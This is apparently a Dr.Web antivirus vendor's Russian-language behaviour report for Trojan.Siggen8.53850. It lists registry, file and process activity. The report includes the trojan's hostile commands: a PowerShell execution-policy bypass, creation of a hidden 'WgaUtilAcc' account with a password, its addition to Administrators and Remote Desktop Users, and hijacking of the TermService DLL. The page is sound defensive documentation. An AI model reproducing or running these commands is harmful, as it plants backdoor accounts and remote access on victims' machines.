Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen8.53850

Добавлен в вирусную базу Dr.Web: 2019-11-05

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Создает следующие сервисы
  • [<HKLM>\system\currentcontrolset\services\TermService\parameters] 'ServiceDLL' = '%ProgramFiles%\windows mail\appcache.xml'
  • [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует отображение:
  • скрытых файлов
  • расширений файлов
Изменяет следующие настройки браузера Windows Internet Explorer
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnPost' = '{01,00,00,00}'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'DisplayName' = 'Internet'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'PMDisplayName' = 'Internet [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Description' = 'This zone contains all Web sites you haven't...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Icon' = 'inetcpl.cpl#001313'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'LowIcon' = 'inetcpl.cpl#005425'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'CurrentLevel' = '00011500'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 'Flags' = '00000001'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'DisplayName' = 'Restricted sites'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'PMDisplayName' = 'Restricted sites [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Description' = 'This zone contains Web sites that could pote...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Icon' = 'inetcpl.cpl#00004481'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'CurrentLevel' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'LowIcon' = 'inetcpl.cpl#005426'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'Flags' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1200' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1200' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1400' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '2500' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'DisplayName' = 'Computer'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Flags' = '00000047'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'CurrentLevel' = '00011000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'LowIcon' = 'inetcpl.cpl#005424'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Icon' = 'inetcpl.cpl#00004480'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '{AEBA21FA-782A-4A90-978D-B72164C80120}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '1A10' = '00000001'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] '{A8A88C49-5EB2-4990-A1A2-0876022C854F}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '{AEBA21FA-782A-4A90-978D-B72164C80120}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1A10' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '{A8A88C49-5EB2-4990-A1A2-0876022C854F}' = '{1a,37,61,59,23,5...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'DisplayName' = 'My Computer'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'PMDisplayName' = 'My Computer [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Description' = 'Your computer'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Icon' = 'shell32.dll#0016'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'PMDisplayName' = 'Computer [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 'CurrentLevel' = '00012000'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'LowIcon' = 'inetcpl.cpl#005422'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'DisplayName' = 'Local intranet'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'PMDisplayName' = 'Local intranet [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Description' = 'This zone contains all Web sites that are on...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Icon' = 'shell32.dll#0018'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'LowIcon' = 'inetcpl.cpl#005423'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'CurrentLevel' = '00010500'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 'Flags' = '00000143'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] '' = ''
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'DisplayName' = 'Trusted sites'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'PMDisplayName' = 'Trusted sites [Protected Mode]'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 'Description' = 'This zone contains Web sites that you trust ...
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 'Flags' = '00000021'
  • [\REGISTRY\USER\S-1-5-21-1960123792-2022915161-3775307078-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnonZoneCrossing' = '00000000'
Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\nsofc89.tmp
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\ietldcache\index.dat
  • C:\users\wgautilacc\appdata\local\microsoft\windows\history\history.ie5\index.dat
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\cookies\index.dat
  • C:\users\wgautilacc\appdata\local\microsoft\windows\<INETFILES>\content.ie5\index.dat
  • C:\users\wgautilacc\appdata\roaming\microsoft\protect\credhist
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\windowsmail.msmessagestore
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.chk
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\tmp.edb
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.log
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edbres00002.jrs
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edbres00001.jrs
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edbtmp.log
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint-pipelineconfig.xml
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint-datafile.dat
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint.dll
  • C:\users\wgautilacc\appdata\local\temp\wgautilacc.bmp
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set57c7.tmp
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set5759.tmp
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set5719.tmp
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set56f9.tmp
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set56d9.tmp
  • C:\users\wgautilacc\contacts\wgautilacc.contact
  • C:\users\wgautilacc\contacts\desktop.ini
  • C:\users\wgautilacc\appdata\local\microsoft\feeds cache\index.dat
  • C:\users\wgautilacc\appdata\local\temp\~dfbc26c9308ab45679.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df08849641e1223585.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df9e09016e1835963b.tmp
  • C:\users\wgautilacc\appdata\local\temp\~dffa49204cf00e7832.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df643d29fe687237b0.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df0efa654c44832c87.tmp
  • C:\users\wgautilacc\appdata\local\temp\~dfea6b20f2cffe0301.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df9663c81c0c785e7f.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df104a477353f3391e.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df819bb5324c9aa2e1.tmp
  • C:\users\wgautilacc\appdata\local\temp\~dfd3b1e3fd935990de.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df3d370eada0aa7da1.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df7ab7a3fa581d5ec5.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df32cb7591a351c52e.tmp
  • C:\users\wgautilacc\appdata\local\temp\~dfa826f84d201e717d.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df9861bc314b20ec68.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df5f9f9b6302712a3d.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df8d74652c87c03071.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df4bebd9cd9dbe80e6.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df4d4de071fe67d8b9.tmp
  • C:\users\wgautilacc\appdata\local\temp\~dfdbcd6979142215d1.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df2d91bea96d8fe475.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df8eade40b6fbd9c6f.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df564b1cd390e0df06.tmp
  • C:\users\wgautilacc\appdata\local\temp\~dfebfd48a04c2dfd10.tmp
  • C:\users\wgautilacc\appdata\local\temp\~df51aac5b03f33bcf2.tmp
  • D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • C:\users\wgautilacc\appdata\local\temp\~dffb84336268f2ed89.tmp
  • C:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\private character editor.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\notepad.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\narrator.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\on-screen keyboard.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\command prompt.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\run.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\windows explorer.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\maintenance\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\maintenance\help.lnk
  • C:\users\wgautilacc\ntuser.dat
  • %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
  • <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
  • <SYSTEM32>\microsoft\protect\s-1-5-20\13f2db5c-fa40-41f4-8568-d6fd285401f9
  • %WINDIR%\temp\usrnm.txt
  • <SYSTEM32>\rfxvmt.dll
  • %ProgramFiles%\windows mail\cleanuptask.cfg
  • %ProgramFiles%\windows mail\default_list.xml
  • %ProgramFiles%\windows mail\appcache.xml
  • %TEMP%\nsofc8a.tmp\system.dll
  • %TEMP%\add.ps1
  • %TEMP%\premiumextraqpjlshwugm.ps1
  • %TEMP%\chadshfsd323.txt
  • %TEMP%\nsofc8a.tmp\blowfish.dll
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\mail recipient.mapimail
  • C:\users\wgautilacc\appdata\local\temp\rgi3490.tmp
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\desktop.ini
  • C:\users\wgautilacc\appdata\local\temp\rgi33c4.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi3394.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi3336.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi32d7.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi3297.tmp
  • C:\users\wgautilacc\appdata\local\microsoft\windows\explorer\explorerstartuplog.etl
  • \device\termdd
  • C:\users\wgautilacc\ntuser.pol
  • C:\users\wgautilacc\ntuser.dat.log1
  • C:\users\wgautilacc\appdata\local\microsoft\windows\usrclass.dat
  • C:\users\wgautilacc\appdata\local\microsoft\windows\usrclass.dat.log1
  • C:\users\wgautilacc\ntuser.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\magnify.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\ease of access.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\fax recipient.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\control panel.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\computer.lnk
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\compressed (zipped) folder.zfsendtotarget
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\sendto\desktop (create shortcut).desklink
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\themes\transcodedwallpaper.jpg
  • C:\users\wgautilacc\appdata\local\temp\~dfc5ad023684414ca9.tmp
Присваивает атрибут 'скрытый' для следующих файлов
  • C:\users\wgautilacc\ntuser.dat
  • C:\users\wgautilacc\appdata\local\microsoft\windows\usrclass.dat
  • C:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1006\desktop.ini
  • C:\users\wgautilacc\contacts\desktop.ini
  • C:\users\wgautilacc\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\desktop.ini
Удаляет следующие файлы
  • %TEMP%\nsofc8a.tmp\blowfish.dll
  • %TEMP%\nsofc8a.tmp\system.dll
  • %TEMP%\chadshfsd323.txt
  • C:\users\wgautilacc\appdata\local\temp\rgi3297.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi32d7.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi3336.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi3394.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi33c4.tmp
  • C:\users\wgautilacc\appdata\local\temp\rgi3490.tmp
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\mxdwdrv.dll
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\tsprint-datafile.dat
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\tsprint-pipelineconfig.xml
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\tsprint.dll
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\xpssvcs.dll
Перемещает следующие файлы
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set56d9.tmp в <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\tsprint.dll
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set56f9.tmp в <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\tsprint-pipelineconfig.xml
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set5719.tmp в <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\tsprint-datafile.dat
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set5759.tmp в <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\mxdwdrv.dll
  • <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\set57c7.tmp в <SYSTEM32>\spool\drivers\x64\{cdfd6218-8d4e-4419-a172-b55ee18f41ac}\xpssvcs.dll
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint.dll в <SYSTEM32>\spool\drivers\x64\3\tsprint.dll
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint-datafile.dat в <SYSTEM32>\spool\drivers\x64\3\tsprint-datafile.dat
  • <SYSTEM32>\spool\drivers\x64\3\new\tsprint-pipelineconfig.xml в <SYSTEM32>\spool\drivers\x64\3\tsprint-pipelineconfig.xml
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edbtmp.log в C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.log
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.log в C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb00001.log
Подменяет следующие файлы
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edbtmp.log
  • C:\users\wgautilacc\appdata\local\microsoft\windows mail\edb.log
Самоудаляется.
Сетевая активность
TCP
  • 'localhost':49171
UDP
  • DNS ASK gs####jifacv.xyz
Другое
Ищет следующие окна
  • ClassName: 'CicLoaderWndClass' WindowName: ''
  • ClassName: 'Progman' WindowName: ''
  • ClassName: 'Proxy Desktop' WindowName: ''
  • ClassName: 'PersonalizationThemeChangeListener' WindowName: ''
  • ClassName: 'SystemTray_Main' WindowName: ''
  • ClassName: 'OutlookExpressHiddenWindow' WindowName: ''
Создает и запускает на исполнение
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %TEMP%\premiumextraQPJLSHWUGM.ps1
  • '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumextraQPJLSHWUGM.ps1' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 000000 /del' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 6jQ5nud3 /add' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" wfhhvhkr$ /ADD' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 6jQ5nud3' (со скрытым окном)
  • '<SYSTEM32>\userinit.exe' ' (со скрытым окном)
  • '%WINDIR%\syswow64\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36' (со скрытым окном)
  • '<SYSTEM32>\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36' (со скрытым окном)
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c powershell -ep bypass -f %TEMP%\premiumextraQPJLSHWUGM.ps1
  • '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" wfhhvhkr$ /ADD
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  • '<SYSTEM32>\net.exe' LOCALGROUP "Administrators" WgaUtilAcc /ADD
  • '<SYSTEM32>\net1.exe' LOCALGROUP "Administrators" WgaUtilAcc /ADD
  • '<SYSTEM32>\cmd.exe' /C net.exe user WgaUtilAcc 6jQ5nud3
  • '<SYSTEM32>\net.exe' user WgaUtilAcc 6jQ5nud3
  • '<SYSTEM32>\net1.exe' user WgaUtilAcc 6jQ5nud3
  • '<SYSTEM32>\smss.exe' 00000000 0000003c
  • '<SYSTEM32>\csrss.exe' ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitializa...
  • '<SYSTEM32>\winlogon.exe'
  • '<SYSTEM32>\rdpclip.exe'
  • '<SYSTEM32>\userinit.exe'
  • '<SYSTEM32>\cmd.exe' /C net.exe LOCALGROUP "Remote Desktop Users" wfhhvhkr$ /ADD
  • '<SYSTEM32>\net.exe' LOCALGROUP "Remote Desktop Users" wfhhvhkr$ /ADD
  • '%WINDIR%\explorer.exe'
  • '%WINDIR%\syswow64\rundll32.exe' advpack.dll,LaunchINFSectionEx <SYSTEM32>\ieuinit.inf,Install,,36
  • '<SYSTEM32>\regsvr32.exe' /s /n /i:/UserInstall <SYSTEM32>\themeui.dll
  • '<SYSTEM32>\rundll32.exe' uxtheme.dll,#64 %WINDIR%\resources\Themes\Aero\Aero.msstyles?NormalColor?NormalSize
  • '%ProgramFiles(x86)%\windows mail\winmail.exe' OCInstallUserConfigOE
  • '%ProgramFiles%\windows mail\winmail.exe' OCInstallUserConfigOE
  • '<SYSTEM32>\unregmp2.exe' /FirstLogon /Shortcuts /RegBrowsers /ResetMUI
  • '<SYSTEM32>\regsvr32.exe' /s /n /i:U shell32.dll
  • '%WINDIR%\syswow64\rundll32.exe' %WINDIR%\SysWOW64\mscories.dll,Install
  • '%ProgramFiles(x86)%\google\chrome\application\42.0.2311.135\installer\chrmstp.exe' --configure-user-settings --verbose-logging --system-level --multi-install --chrome
  • '%WINDIR%\syswow64\ie4uinit.exe' -UserIconConfig
  • '%WINDIR%\syswow64\ie4uinit.exe' -ClearIconCache
  • '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\SysWOW64\iedkcs32.dll",BrandIEActiveSetup SIGNUP
  • '%WINDIR%\syswow64\ie4uinit.exe' -BaseSettings
  • '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
  • '<SYSTEM32>\cmd.exe' /c del %temp%\*.txt /f
  • '<SYSTEM32>\cmd.exe' /c del %temp%\*.ps1 /f
  • '<SYSTEM32>\net1.exe' LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
